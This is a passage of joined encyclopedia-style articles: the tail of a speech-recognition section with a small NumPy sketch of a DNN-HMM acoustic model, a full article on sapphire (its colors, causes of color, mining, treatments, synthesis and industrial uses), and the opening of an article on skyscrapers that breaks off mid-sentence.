decision trees. See comprehensive reviews of this development, and of the state of the art as of October 2014, in the Springer book from Microsoft Research.
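The hybrid setup described above can be sketched in a few lines: a feedforward network maps a spliced window of acoustic frames to posterior probabilities over context-dependent HMM states. This is a minimal illustration with assumed sizes and randomly initialized weights standing in for trained parameters, not the 2010 systems themselves.

# Sketch of a hybrid DNN-HMM acoustic model's forward pass
# (sizes and weights are illustrative assumptions).
import numpy as np

rng = np.random.default_rng(0)
NUM_INPUT = 11 * 40    # e.g. an 11-frame window of 40-dim features (assumption)
NUM_STATES = 3000      # e.g. decision-tree-clustered HMM states (assumption)

# Randomly initialized weights stand in for trained parameters.
W1, b1 = rng.normal(0, 0.01, (512, NUM_INPUT)), np.zeros(512)
W2, b2 = rng.normal(0, 0.01, (512, 512)), np.zeros(512)
W3, b3 = rng.normal(0, 0.01, (NUM_STATES, 512)), np.zeros(NUM_STATES)

def dnn_posteriors(x):
    # x: (NUM_INPUT,) spliced feature window -> (NUM_STATES,) state posteriors
    h1 = np.maximum(0.0, W1 @ x + b1)    # hidden layer 1 (ReLU)
    h2 = np.maximum(0.0, W2 @ h1 + b2)   # hidden layer 2 (ReLU)
    logits = W3 @ h2 + b3
    e = np.exp(logits - logits.max())    # numerically stable softmax
    return e / e.sum()

post = dnn_posteriors(rng.normal(size=NUM_INPUT))
print(post.shape, round(float(post.sum()), 6))   # (3000,) 1.0
# In a hybrid DNN-HMM system, these posteriors are divided by state priors
# to obtain scaled likelihoods that plug into HMM decoding (e.g., Viterbi).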
Technology
Artificial intelligence concepts
null
29469
https://en.wikipedia.org/wiki/Sapphire
Sapphire
Sapphire is a precious gemstone, a variety of the mineral corundum, consisting of aluminium oxide (Al2O3) with trace amounts of elements such as iron, titanium, cobalt, lead, chromium, vanadium, magnesium, boron, and silicon. The name sapphire is derived from the Latin word sapphirus, itself from the Greek word sappheiros, which referred to lapis lazuli. It is typically blue, but natural "fancy" sapphires also occur in yellow, purple, orange, and green colors; "parti sapphires" show two or more colors. Red corundum stones also occur, but are called rubies rather than sapphires. Pink-colored corundum may be classified either as ruby or sapphire depending on the locale. Commonly, natural sapphires are cut and polished into gemstones and worn in jewelry. They also may be created synthetically in laboratories, for industrial or decorative purposes, in large crystal boules. Because of the remarkable hardness of sapphire (9 on the Mohs scale, making it the third-hardest mineral, after diamond at 10 and moissanite at 9.5), sapphires are also used in some non-ornamental applications, such as infrared optical components, high-durability windows, wristwatch crystals and movement bearings, and very thin electronic wafers, which are used as the insulating substrates of special-purpose solid-state electronics such as integrated circuits and GaN-based blue LEDs. Sapphire is the birthstone for September and the gem of the 45th anniversary. A sapphire jubilee occurs after 65 years. Natural sapphires Sapphire is one of the two gem varieties of corundum, the other being ruby (defined as corundum in a shade of red). Although blue is the best-known sapphire color, sapphire occurs in other colors, including gray and black, and can also be colorless. A pinkish-orange variety of sapphire is called padparadscha. Significant sapphire deposits are found in Australia, Afghanistan, Cambodia, Cameroon, China (Shandong), Colombia, Ethiopia, India (Jammu and Kashmir: Padder, Kishtwar), Kenya, Laos, Madagascar, Malawi, Mozambique, Myanmar (Burma), Nigeria, Rwanda, Sri Lanka, Tanzania, Thailand, the United States (Montana), and Vietnam. Sapphires and rubies are often found in the same geographical settings, but they generally have different geological formations. For example, both ruby and sapphire are found in Myanmar's Mogok Stone Tract, but the rubies form in marble, while the sapphires form in granitic pegmatites or corundum syenites. Every sapphire mine produces a wide range of quality, and origin is not a guarantee of quality. For sapphire, Jammu and Kashmir origin receives the highest premium, although Burma, Sri Lanka, and Madagascar also produce large quantities of fine-quality gems. The cost of natural sapphires varies depending on their color, clarity, size, cut, and overall quality. Sapphires that are completely untreated are worth far more than those that have been treated. Geographical origin also has a major impact on price. For most gems of one carat or more, an independent report from a respected laboratory such as GIA, Lotus Gemology, or SSEF is often required by buyers before they will make a purchase. Colors Sapphires in colors other than blue are called "fancy" sapphires. "Parti sapphire" is used for multicolor stones with zoning of different colors (hues), but not different shades. Fancy sapphires are found in yellow, orange, green, brown, purple, violet, and practically any other hue. Blue sapphire Gemstone color can be described in terms of hue, saturation, and tone. Hue is commonly understood as the "color" of the gemstone.
Saturation refers to the vividness or brightness of the hue, and tone is the lightness to darkness of the hue. Blue sapphire exists in various mixtures of its primary (blue) and secondary hues, various tonal levels (shades), and various levels of saturation (vividness). Blue sapphires are evaluated based upon the purity of their blue hue. Violet and green are the most common secondary hues found in blue sapphires. The highest prices are paid for gems that are pure blue and of vivid saturation. Gems of lower saturation, or that are too dark or too light in tone, are of less value. However, color preferences are a matter of personal taste. The Logan Sapphire in the National Museum of Natural History, in Washington, D.C., is one of the largest faceted gem-quality blue sapphires in existence. Parti sapphires Particolored sapphires (or bi-color sapphires) are stones that exhibit two or more colors within a single stone. The desirability of particolored or bi-color sapphires is usually judged based on the zoning or location of their colors, the colors' saturation, and the contrast of their colors. Australia is the largest source of particolored sapphires; they are not commonly used in mainstream jewelry and remain relatively little known. Particolored sapphires cannot be created synthetically and only occur naturally. Pink sapphires Pink sapphires occur in shades from light to dark pink, and deepen in color as the quantity of chromium increases. The deeper the pink color, the higher their monetary value. In the United States, a minimum color saturation must be met for a stone to be called a ruby; otherwise, it is referred to as a pink sapphire. Padparadscha Padparadscha is a delicate, light- to medium-toned, pink-orange to orange-pink hued corundum, originally found in Sri Lanka, but also found in deposits in Vietnam and parts of East Africa. Padparadscha sapphires are rare; the rarest of all is the totally natural variety, with no sign of artificial treatment. The name is derived from the Sanskrit padma ranga (padma = lotus; ranga = color), a color akin to the lotus flower (Nelumbo nucifera). Among the fancy (non-blue) sapphires, natural padparadscha fetch the highest prices. Since 2001, more sapphires of this color have appeared on the market as a result of artificial lattice diffusion of beryllium. Star sapphire A star sapphire is a type of sapphire that exhibits a star-like phenomenon known as asterism; red stones are known as "star rubies". Star sapphires contain intersecting needle-like inclusions, following the underlying crystal structure, that cause the appearance of a six-rayed "star"-shaped pattern when viewed with a single overhead light source. The inclusion is often the mineral rutile, composed primarily of titanium dioxide. The stones are cut en cabochon, typically with the center of the star near the top of the dome. Occasionally, twelve-rayed stars are found, typically because two different sets of inclusions occur within the same stone, such as a combination of fine needles of rutile with small platelets of hematite; the first results in a whitish star and the second in a golden-colored star. During crystallization, the two types of inclusions become preferentially oriented in different directions within the crystal, thereby forming two six-rayed stars that are superimposed upon each other to form a twelve-rayed star. Misshapen stars or twelve-rayed stars may also form as a result of twinning.
The inclusions can alternatively produce a "cat's eye" effect if the girdle plane of the cabochon is oriented parallel to the crystal's c-axis rather than perpendicular to it. To produce a cat's eye, the planes of exsolved inclusions must be extremely uniform and tightly packed. If the dome is oriented between these two directions, an off-center star will be visible, offset away from the high point of the dome. At 1,404.49 carats, the Star of Adam is the largest known blue star sapphire. The gem was mined in the city of Ratnapura, southern Sri Lanka. The Black Star of Queensland, the second-largest star sapphire in the world, weighs 733 carats. The Star of India, mined in Sri Lanka and weighing 563.4 carats, is thought to be the third-largest star sapphire, and is currently on display at the American Museum of Natural History in New York City. The 182-carat Star of Bombay, mined in Sri Lanka and located in the National Museum of Natural History in Washington, D.C., is another example of a large blue star sapphire. The value of a star sapphire depends not only on the weight of the stone, but also on the body color, visibility, and intensity of the asterism. The color of the stone has more impact on the value than the visibility of the star. Since more transparent stones tend to have better colors, the most expensive star stones are semi-transparent "glass body" stones with vivid colors. On 28 July 2021, the world's largest cluster of star sapphires was unearthed in Ratnapura, Sri Lanka, and named the "Serendipity Sapphire". Color-change sapphire A rare variety of natural sapphire, known as color-change sapphire, exhibits different colors in different light. Color-change sapphires are blue in outdoor light and purple under incandescent indoor light, or green to gray-green in daylight and pink to reddish-violet in incandescent light. Color-change sapphires come from a variety of locations, including Madagascar, Myanmar, Sri Lanka, and Tanzania. Two types exist. The first features the chromium chromophore that creates the red color of ruby, combined with the iron + titanium chromophore that produces the blue color in sapphire. A rarer type, which comes from the Mogok area of Myanmar, features a vanadium chromophore, the same as is present in Verneuil synthetic color-change sapphire. Virtually all gemstones that show the "alexandrite effect" (color change, or "metamerism") show similar absorption/transmission features in the visible spectrum: an absorption band in the yellow (~590 nm), along with valleys of transmission in the blue-green and red. Thus the color one sees depends on the spectral composition of the light source. Daylight is relatively balanced in its spectral power distribution (SPD), and since the human eye is most sensitive to green light, the balance is tipped to the green side. Incandescent light (including candlelight), however, is heavily tilted toward the red end of the spectrum, thus tipping the balance to red. Color-change sapphires colored by the Cr + Fe/Ti chromophores generally change from blue or violet-blue to violet or purple. Those colored by the V chromophore can show a more pronounced change, moving from blue-green to purple. Certain synthetic color-change sapphires have a color change similar to that of the natural gemstone alexandrite, and they are sometimes marketed as "alexandrium" or "synthetic alexandrite".
However, the latter term is a misnomer: synthetic color-change sapphires are, technically, not synthetic alexandrite but rather alexandrite simulants. This is because genuine alexandrite is a variety of chrysoberyl: not sapphire, but an entirely different mineral from corundum. Large rubies and sapphires Large rubies and sapphires of poor transparency are frequently offered with suspect appraisals that vastly overstate their value. This was the case with the "Life and Pride of America Star Sapphire". Circa 1985, Roy Whetstine claimed to have bought the 1,905-ct stone for $10 at the Tucson gem show, but a reporter discovered that L.A. Ward of Fallbrook, California, who appraised it at $1,200 per carat, had appraised another stone of the exact same weight several years before Whetstine claimed to have found it. Bangkok-based Lotus Gemology maintains an updated listing of world auction records for ruby, sapphire, and spinel. As of November 2019, no sapphire had ever sold at auction for more than US$17,295,796. Cause of color Rubies are corundum with a dominant red body color. This is generally caused by traces of chromium (Cr3+) substituting for the aluminium (Al3+) ion in the corundum structure. The color can be modified by both iron and trapped-hole color centers. Unlike the localized ("intra-atomic") absorption of light that causes color in chromium and vanadium impurities, the blue color in sapphires comes from intervalence charge transfer, which is the transfer of an electron from one transition-metal ion to another via the conduction or valence band. The iron can take the form Fe2+ or Fe3+, while titanium generally takes the form Ti4+. If Fe2+ and Ti4+ ions are substituted for Al3+, localized areas of charge imbalance are created. An electron transfer from Fe2+ to Ti4+ can cause a change in the valence state of both. Because of the valence change, there is a specific change in energy for the electron, and electromagnetic energy is absorbed. The wavelength of the energy absorbed corresponds to yellow light. When this light is subtracted from incident white light, the complementary color blue results. Sometimes, when atomic spacing is different in different directions, blue-green dichroism results. Purple sapphires contain trace amounts of chromium and iron plus titanium, and come in a variety of shades. Corundum that contains extremely low levels of chromophores is near colorless. Completely colorless corundum generally does not exist in nature. If trace amounts of iron are present, a very pale yellow to green color may be seen. However, if both titanium and iron impurities are present together, and in the correct valence states, the result is a blue color. Intervalence charge transfer is a process that produces a strongly colored appearance at a low percentage of impurity. While at least 1% chromium must be present in corundum before the deep red ruby color is seen, sapphire blue is apparent with the presence of only 0.01% titanium and iron. Colorless sapphires, which are uncommon in nature, were once used as diamond substitutes in jewelry, and are presently used as accent stones. The most complete description of the causes of color in corundum extant can be found in Chapter 4 of Ruby & Sapphire: A Gemologist's Guide (chapter authored by John Emmett, Emily Dubinsky and Richard Hughes).
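As a rough back-of-the-envelope illustration (not a figure from the sources cited above), the Planck relation links the absorbed yellow band near 590 nm to the energy of the Fe2+ to Ti4+ charge transfer:

E = hc / λ
  = (6.626 × 10^-34 J s)(2.998 × 10^8 m/s) / (590 × 10^-9 m)
  ≈ 3.4 × 10^-19 J ≈ 2.1 eV

so the charge-transfer absorption corresponds to an energy gap of roughly 2 eV, and removing this yellow band from incident white light leaves the complementary blue that the eye perceives.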
Mining Sapphires are mined from alluvial deposits or from primary underground workings. Commercial mining locations for sapphire and ruby include (but are not limited to) the following countries: Afghanistan, Australia, Myanmar/Burma, Cambodia, China, Colombia, India, Kenya, Laos, Madagascar, Malawi, Nepal, Nigeria, Pakistan, Sri Lanka, Tajikistan, Tanzania, Thailand, the United States, and Vietnam. Sapphires from different geographic locations may have different appearances or chemical-impurity concentrations, and tend to contain different types of microscopic inclusions. Because of this, sapphires can be divided into three broad categories: classic metamorphic, non-classic metamorphic or magmatic, and classic magmatic. Sapphires from certain locations, or of certain categories, may be more commercially appealing than others, particularly classic metamorphic sapphires from Kashmir, Burma, or Sri Lanka that have not been subjected to heat treatment. The Logan Sapphire, the Star of India, the Star of Adam, and the Star of Bombay originate from Sri Lankan mines. Madagascar is the world leader in sapphire production (as of 2007), specifically from its deposits in and around the town of Ilakaka. Prior to the opening of the Ilakaka mines, Australia was the largest producer of sapphires (for example, in 1987). In 1991 a new source of sapphires was discovered in Andranondambo, southern Madagascar. Exploitation started in 1993 but was practically abandoned just a few years later because of the difficulties of recovering sapphires from their bedrock. In North America, sapphires have been mined mostly from deposits in Montana: along the Missouri River near Helena, at Dry Cottonwood Creek near Deer Lodge, and at Rock Creek near Philipsburg. Fine blue Yogo sapphires are found at Yogo Gulch, west of Lewistown, Montana. A few gem-grade sapphires and rubies have also been found in the area of Franklin, North Carolina. The sapphire deposits of Kashmir are well known in the gem industry, although their peak production took place in a relatively short period at the end of the nineteenth and beginning of the twentieth centuries. These deposits are located in the Paddar Valley of the Jammu region of Jammu and Kashmir in India. They have a superior vivid blue hue, coupled with a mysterious and almost sleepy quality, described by some gem enthusiasts as "blue velvet". Kashmir origin contributes meaningfully to the value of a sapphire, and most corundum of Kashmir origin can be readily identified by its characteristic silky appearance and exceptional hue. The unique blue appears lustrous under any kind of light, unlike non-Kashmir sapphires, which may appear purplish or grayish in comparison. Sotheby's has been at the forefront of record-breaking sales of Kashmir sapphires worldwide. In October 2014, Sotheby's Hong Kong achieved consecutive per-carat price records for Kashmir sapphires – first with the 12.00-carat Cartier sapphire ring at US$193,975 per carat, then with a 17.16-carat sapphire at US$236,404 – and again in June 2015, when the per-carat auction record was set at US$240,205. At present, the world record price per carat for a sapphire at auction is held by a Kashmir sapphire in a ring, which sold in October 2015 for approximately US$242,000 per carat (HK$52,280,000 in total, including buyer's premium, or more than US$6.74 million). Treatments Sapphires can be treated by several methods to enhance and improve their clarity and color. It is common practice to heat natural sapphires to improve or enhance their appearance.
This is done by heating the sapphires in furnaces at high temperatures for several hours, or even weeks at a time. Different atmospheres may be used. Upon heating, the stone becomes bluer in color, but loses some of its rutile inclusions (silk). When high temperatures (1400 °C and above) are used, exsolved rutile silk is dissolved and the stone becomes clear under magnification. The titanium from the rutile enters solid solution and, together with iron, creates the blue color. The inclusions in natural stones are easily seen with a jeweler's loupe. Evidence of sapphire and other gemstones being subjected to heating goes back at least to Roman times. Unheated natural stones are somewhat rare and will often be sold accompanied by a certificate from an independent gemological laboratory attesting to "no evidence of heat treatment". Yogo sapphires do not need heat treating because their cornflower blue color is attractive out of the ground; they are generally free of inclusions, and have high uniform clarity. When Intergem Limited began marketing the Yogo in the 1980s as the world's only guaranteed untreated sapphire, heat treatment was not commonly disclosed; by the late 1980s, heat treatment became a major issue. At that time, much of the world's sapphire supply was being heated to enhance its natural color. Intergem's marketing of guaranteed untreated Yogos set them against many in the gem industry. This issue appeared as a front-page story in The Wall Street Journal on 29 August 1984, in an article by Bill Richards, "Carats and Schticks: Sapphire Marketer Upsets the Gem Industry". However, the biggest problem the Yogo mine faced was not competition from heated sapphires, but the fact that it could never produce significant quantities of sapphires above one carat after faceting. As a result, the Yogo has remained a niche product, with a market that largely exists in the US. Lattice ("bulk") diffusion treatments are used to add impurities to the sapphire to enhance color. This process was originally developed and patented by the Linde Air division of Union Carbide and involved diffusing titanium into synthetic sapphire to even out the blue color. It was later applied to natural sapphire. Today, titanium diffusion often uses a synthetic colorless sapphire base. The color layer created by titanium diffusion is extremely thin (less than 0.5 mm), so repolishing can produce slight to significant loss of color. Chromium diffusion has been attempted, but was abandoned due to the slow diffusion rates of chromium in corundum. In the year 2000, beryllium-diffused "padparadscha"-colored sapphires entered the market. Typically beryllium is diffused into a sapphire under very high heat, just below the melting point of the sapphire. Initially orange sapphires were created, although the process has since been advanced and many colors of sapphire are now treated with beryllium. Due to the small size of the beryllium ion, the color penetration is far greater than with titanium diffusion; in some cases, it may penetrate the entire stone. Beryllium-diffused orange sapphires may be difficult to detect, requiring advanced chemical analysis by gemological labs (e.g., Gübelin, SSEF, GIA, American Gemological Laboratories (AGL), or Lotus Gemology). According to United States Federal Trade Commission guidelines, disclosure is required of any mode of enhancement that has a significant effect on the gem's value. There are several ways of treating sapphire.
Heat treatment in a reducing or oxidizing atmosphere (but without the use of any other added impurities) is commonly used to improve the color of sapphires, and this process is sometimes known as "heating only" in the gem trade. In contrast, heat treatment combined with the deliberate addition of certain specific impurities (e.g. beryllium, titanium, iron, chromium or nickel, which are absorbed into the crystal structure of the sapphire) is also commonly performed, and this process is known as "diffusion" in the gem trade. However, despite what the terms "heating only" and "diffusion" might suggest, both of these categories of treatment actually involve diffusion processes. The most complete extant description of corundum treatments can be found in Chapter 6 of Ruby & Sapphire: A Gemologist's Guide (chapter authored by John Emmett, Richard Hughes and Troy R. Douthit).
Synthetic sapphire
In 1902, the French chemist Auguste Verneuil announced a process for producing synthetic ruby crystals. In the flame-fusion, or Verneuil, process, fine alumina powder is added to an oxyhydrogen flame, which is directed downward against a ceramic pedestal. Following the successful synthesis of ruby, Verneuil focused his efforts on sapphire. Synthesis of blue sapphire came in 1909, after chemical analyses of sapphire suggested to Verneuil that iron and titanium were the cause of the blue color. Verneuil patented the process of producing synthetic blue sapphire in 1911. The key to the process is that the alumina powder does not melt as it falls through the flame. Instead it forms a sinter cone on the pedestal. When the tip of that cone reaches the hottest part of the flame, the tip melts. Crystal growth thus starts from a tiny point, ensuring minimal strain. Next, more oxygen is added to the flame, causing it to burn slightly hotter and expanding the growing crystal laterally. At the same time, the pedestal is lowered at the same rate that the crystal grows vertically. The alumina in the flame is slowly deposited, creating a teardrop-shaped "boule" of sapphire material. This continues until the desired size is reached; the flame is then shut off and the crystal cools. The elongated crystal now contains a great deal of strain due to the high thermal gradient between the flame and the surrounding air. To release this strain, the finger-shaped crystal is tapped with a chisel to split it into two halves. Due to the vertical layered growth of the crystal and the curved upper growth surface (which starts from a drop), the crystals display curved growth lines following the top surface of the boule. This is in contrast to natural corundum crystals, which feature angular growth lines expanding from a single point and following the planar crystal faces.
Dopants
Chemical dopants can be added to create artificial versions of ruby and all the other natural colors of sapphire, as well as colors never seen in geological samples. Artificial sapphire material is identical to natural sapphire, except that it can be made without the flaws found in natural stones. The disadvantage of the Verneuil process is that the grown crystals have high internal strains. Many methods of manufacturing sapphire today are variations of the Czochralski process, which was invented in 1916 by Polish chemist Jan Czochralski.
In this process, a tiny sapphire seed crystal is dipped into a crucible made of iridium or molybdenum containing molten alumina, and then slowly withdrawn upward at a rate of 1 to 100 mm per hour. The alumina crystallizes on the end, creating long, carrot-shaped boules of up to 200 kg in mass.
Other growth methods
Synthetic sapphire is also produced industrially from agglomerated aluminum oxide, sintered and fused (such as by hot isostatic pressing) in an inert atmosphere, yielding a transparent but slightly porous polycrystalline product. In 2003, the world's production of synthetic sapphire was 250 tons (1.25 × 10⁹ carats), mostly by the United States and Russia. The availability of cheap synthetic sapphire has unlocked many industrial uses for this unique material.
Applications
Equipment windows
Synthetic sapphire, also referred to as sapphire glass, is commonly used for small windows, because it is both highly transparent to wavelengths of light between 150 nm (UV) and 5500 nm (IR) (the visible spectrum extends from about 380 nm to 750 nm) and extraordinarily scratch-resistant. The key benefits of sapphire windows are:
Very wide optical transmission band from UV to near-infrared (0.15–5.5 μm)
Significantly stronger than other optical materials or standard glass windows
Highly resistant to scratching and abrasion (9 on the Mohs scale of mineral hardness; the third-hardest natural substance, after diamond and moissanite)
Extremely high melting temperature (2030 °C)
Some sapphire-glass windows are made from pure sapphire boules that have been grown in a specific crystal orientation, typically along the optical axis, the c-axis, for minimum birefringence in the application. The boules are sliced into the desired window thickness and finally polished to the desired surface finish. Sapphire optical windows can be polished to a wide range of surface finishes due to the material's crystal structure and hardness. The surface finishes of optical windows are normally specified by scratch-dig values in accordance with the globally adopted MIL-O-13830 specification. Sapphire windows are used in high-pressure and vacuum chambers for spectroscopy, in crystals for watches, and in windows in grocery-store barcode scanners, since the material's exceptional hardness and toughness make it very resistant to scratching. In 2014 Apple consumed "one-fourth of the world's supply of sapphire to cover the iPhone's camera lens and fingerprint reader". Several attempts have been made to make sapphire screens for smartphones viable. Apple contracted GT Advanced Technologies, Inc. to manufacture sapphire screens for iPhones, but the venture failed, causing the bankruptcy of GTAT. The Kyocera Brigadier was the first production smartphone with a sapphire screen. Sapphire is used for end windows on some high-powered laser tubes, as its wide-band transparency and thermal conductivity allow it to handle very high power densities in the infrared and UV spectrum without degrading due to heating. One type of xenon arc lamp, originally called the "Cermax" and now known generically as the "ceramic-body xenon lamp", uses sapphire crystal output windows that tolerate higher thermal loads, and consequently can provide higher output powers, than conventional Xe lamps with pure silica windows. A sapphire window was also used for the F-35 Lightning II Electro-Optical Targeting System, due to its high strength.
Along with zirconia and aluminum oxynitride, synthetic sapphire is used for shatter-resistant windows in armored vehicles and various military body armor suits, in association with composites.
As substrate for semiconducting circuits
Thin sapphire wafers were the first successful use of an insulating substrate upon which to deposit silicon to make the integrated circuits known as silicon on sapphire or "SOS"; other substrates can now also be used for the class of circuits known more generally as silicon on insulator. Besides its excellent electrical insulating properties, sapphire has high thermal conductivity. CMOS chips on sapphire are especially useful for high-power radio-frequency (RF) applications such as those found in cellular telephones, public-safety band radios, and satellite communication systems. "SOS" also allows for the monolithic integration of both digital and analog circuitry on one IC chip, and the construction of extremely low-power circuits. In one process, after single-crystal sapphire boules are grown, they are core-drilled into cylindrical rods, and wafers are then sliced from these cores. Wafers of single-crystal sapphire are also used in the semiconductor industry as substrates for the growth of devices based on gallium nitride (GaN). The use of sapphire significantly reduces the cost, because it has about one-seventh the cost of germanium. Gallium nitride on sapphire is commonly used in blue light-emitting diodes (LEDs).
In lasers
The first laser was made in 1960 by Theodore Maiman with a rod of synthetic ruby. Titanium-sapphire lasers are popular due to their relatively rare capacity to be tuned to various wavelengths in the red and near-infrared region of the electromagnetic spectrum. They can also be easily mode-locked. In these lasers, a synthetically produced sapphire crystal with chromium or titanium impurities is irradiated with intense light from a special lamp, or another laser, to create stimulated emission.
In endoprostheses
Monocrystalline sapphire is fairly biocompatible, and the exceptionally low wear of sapphire–metal pairs has led to the introduction (in Ukraine) of sapphire monocrystals for hip joint endoprostheses.
Historical and cultural references
Etymologically, the English word "sapphire" derives from French saphir, from Latin sapphirus, from Greek σαπφειρος (sappheiros), from Hebrew סַפִּיר (sappir), a term that probably originally referred to lapis lazuli, as sapphires were only discovered in Roman times. The term is believed to derive from the root סָפַר (sāp̄ar), meaning "to score with a mark," presumably because gemstones can be used to scratch stone surfaces due to their high hardness. A traditional Hindu belief holds that the sapphire causes the planet Saturn (Shani) to be favorable to the wearer. The Greek term for sapphire quite likely was instead used to refer to lapis lazuli. During the Middle Ages, European lapidaries came to refer to blue corundum crystal as "sapphire", a derivative of its Latin name, sapphirus. The sapphire is the traditional gift for a 45th wedding anniversary. A sapphire jubilee occurs after 65 years; in 2017 Queen Elizabeth II marked the sapphire jubilee of her accession to the throne. The sapphire is the birthstone of September. An Italian superstition holds that sapphires are amulets against eye problems and melancholy. Mary, Queen of Scots, owned a medicinal sapphire worn as a pendant to rub sore eyes.
Pope Innocent III decreed that rings of bishops should be made of pure gold, set with an unengraved sapphire, as possessing the virtues and qualities essential to its dignified position as a seal of secrets, for there be many things "that a priest conceals from the senses of the vulgar and less intelligent; which he keeps locked up as it were under seal." The sapphire has been the official state gem of Queensland since August 1985.
Notable sapphires
Extensive tables listing over a hundred important and famous rubies and sapphires can be found in Chapter 10 of Ruby & Sapphire: A Gemologist's Guide.
Skyscraper
A skyscraper is a tall, continuously habitable building having multiple floors. Modern sources define skyscrapers as exceeding a minimum height, commonly 150 m (492 ft), though there is no universally accepted definition, other than being very tall high-rise buildings. Skyscrapers may host offices, hotels, residential spaces, and retail spaces. One common feature of skyscrapers is having a steel frame that supports curtain walls. These curtain walls either bear on the framework below or are suspended from the framework above, rather than resting on load-bearing walls of conventional construction. Some early skyscrapers have a steel frame that enables the construction of load-bearing walls taller than those made of reinforced concrete. Modern skyscraper walls are not load-bearing, and most skyscrapers are characterized by large surface areas of windows made possible by steel frames and curtain walls. However, skyscrapers can have curtain walls that mimic conventional walls with a small surface area of windows. Modern skyscrapers often have a tubular structure, and are designed to act like a hollow cylinder to resist wind, seismic, and other lateral loads. To appear more slender, allow less wind exposure and transmit more daylight to the ground, many skyscrapers have a design with setbacks, which in some cases is also structurally required. Fifteen cities in the world have more than 100 skyscrapers that are 150 m (492 ft) or taller: Hong Kong with 552 skyscrapers; Shenzhen, China with 373 skyscrapers; New York City, US with 314 skyscrapers; Dubai, UAE with 252 skyscrapers; Guangzhou, China with 188 skyscrapers; Shanghai, China with 183 skyscrapers; Tokyo, Japan with 168 skyscrapers; Kuala Lumpur, Malaysia with 156 skyscrapers; Wuhan, China with 149 skyscrapers; Chongqing, China with 144 skyscrapers; Chicago, US with 137 skyscrapers; Chengdu, China with 117 skyscrapers; Jakarta, Indonesia with 112 skyscrapers; Bangkok, Thailand with 111 skyscrapers; and Mumbai, India with 102. As of 2024, there are over 7,000 skyscrapers over 150 m (492 ft) in height worldwide.
Definition
The term "skyscraper" was first applied to buildings of steel-framed construction of at least 10 stories in the late 19th century, a result of public amazement at the tall buildings being built in major American cities like New York City, Philadelphia, Boston, Chicago, Detroit, and St. Louis. The first steel-frame skyscraper was the Home Insurance Building, originally 10 stories with a height of 42.1 m (138 ft), built in Chicago in 1885; two additional stories were later added. Some point to Philadelphia's 10-story Jayne Building (1849–50) as a proto-skyscraper, or to New York's seven-floor Equitable Life Building, built in 1870. Steel skeleton construction has allowed for today's supertall skyscrapers now being built worldwide. The nomination of one structure versus another as the first skyscraper, and why, depends on what factors are stressed. The structural definition of the word skyscraper was refined later by architectural historians, based on engineering developments of the 1880s that had enabled construction of tall multi-story buildings. This definition was based on the steel skeleton, as opposed to constructions of load-bearing masonry, which passed their practical limit in 1891 with Chicago's Monadnock Building. Louis Sullivan explored the aesthetics of the new building type in his essay The Tall Office Building Artistically Considered (1896). Some structural engineers define a high-rise as any vertical construction for which wind is a more significant load factor than earthquake or weight.
Note that this criterion fits not only high-rises but some other tall structures, such as towers. Different organizations from the United States and Europe define skyscrapers as buildings at least 150 m (492 ft) in height, with "supertall" skyscrapers for buildings higher than 300 m (984 ft) and "megatall" skyscrapers for those taller than 600 m (1,969 ft). The tallest structure in ancient times was the Great Pyramid of Giza in ancient Egypt, built in the 26th century BC. It was not surpassed in height for thousands of years, until Lincoln Cathedral exceeded it during the period 1311–1549, before the cathedral's central spire collapsed. The latter in turn was not surpassed until the Washington Monument in 1884. However, being uninhabited, none of these structures actually comply with the modern definition of a skyscraper. High-rise apartments flourished in classical antiquity. Ancient Roman insulae in imperial cities reached 10 and more stories. Beginning with Augustus (r. 30 BC–14 AD), several emperors attempted to establish height limits for multi-story buildings, but were met with only limited success. Lower floors were typically occupied by shops or wealthy families, with the upper floors rented to the lower classes. Surviving Oxyrhynchus Papyri indicate that seven-story buildings existed in provincial towns, such as 3rd-century AD Hermopolis in Roman Egypt. The skylines of many important medieval cities had large numbers of high-rise urban towers, built by the wealthy for defense and status. The residential towers of 12th-century Bologna numbered between 80 and 100 at a time, the tallest of which is the 97 m (318 ft) Asinelli Tower. A Florentine law of 1251 decreed that all urban buildings be immediately reduced in height to below a set limit. Even medium-sized towns of the era are known to have had proliferations of towers, such as the 72 towers of San Gimignano. The medieval Egyptian city of Fustat housed many high-rise residential buildings, which Al-Muqaddasi in the 10th century described as resembling minarets. Nasir Khusraw in the early 11th century described some of them rising up to 14 stories, with roof gardens on the top floor complete with ox-drawn water wheels for irrigating them. Cairo in the 16th century had high-rise apartment buildings where the two lower floors were for commercial and storage purposes and the multiple stories above them were rented out to tenants. An early example of a city consisting entirely of high-rise housing is the 16th-century city of Shibam in Yemen. Shibam was made up of over 500 tower houses, each one rising 5 to 11 stories high, with each floor being an apartment occupied by a single family. The city was built in this way in order to protect it from Bedouin attacks. Shibam still has the tallest mudbrick buildings in the world, many of them over 30 m (98 ft) high. An early modern example of high-rise housing was in 17th-century Edinburgh, Scotland, where a defensive city wall defined the boundaries of the city. Due to the restricted land area available for development, the houses increased in height instead. Buildings of 11 stories were common, and there are records of buildings as high as 14 stories. Many of the stone-built structures can still be seen today in the old town of Edinburgh. The oldest iron-framed building in the world, although only partially iron-framed, is The Flaxmill in Shrewsbury, England.
Built in 1797, it is seen as the "grandfather of skyscrapers", since its fireproof combination of cast-iron columns and cast-iron beams developed into the modern steel frame that made modern skyscrapers possible. In 2013 funding was confirmed to convert the derelict building into offices.
Early skyscrapers
In 1857, Elisha Otis introduced the safety elevator at the E. V. Haughwout Building in New York City, allowing convenient and safe transport to buildings' upper floors. Otis later installed the first commercial passenger elevators in the Equitable Life Building in 1870, considered by some architectural historians to be the first skyscraper. Another crucial development was the use of a steel frame instead of stone or brick; otherwise the walls on the lower floors of a tall building would be too thick to be practical. An early development in this area was Oriel Chambers in Liverpool, England, built in 1864. It was only five floors high. The Royal Academy of Arts states, "critics at the time were horrified by its 'large agglomerations of protruding plate glass bubbles'. In fact, it was a precursor to Modernist architecture, being the first building in the world to feature a metal-framed glass curtain wall, a design element which creates light, airy interiors and has since been used the world over as a defining feature of skyscrapers". Further developments led to what many individuals and organizations consider the world's first skyscraper, the ten-story Home Insurance Building in Chicago, built in 1884–1885. While its original height of 42.1 m (138 ft) would not even qualify it as a skyscraper today, it was record-setting. The construction of tall buildings in the 1880s gave the skyscraper its first architectural movement, broadly termed the Chicago School, which developed what has been called the Commercial Style. The architect, Major William Le Baron Jenney, created a load-bearing structural frame. In this building, a steel frame supported the entire weight of the walls, instead of load-bearing walls carrying the weight of the building. This development led to the "Chicago skeleton" form of construction. In addition to the steel frame, the Home Insurance Building also utilized fireproofing, elevators, and electrical wiring, key elements in most skyscrapers today. Burnham and Root's Rand McNally Building in Chicago, 1889, was the first 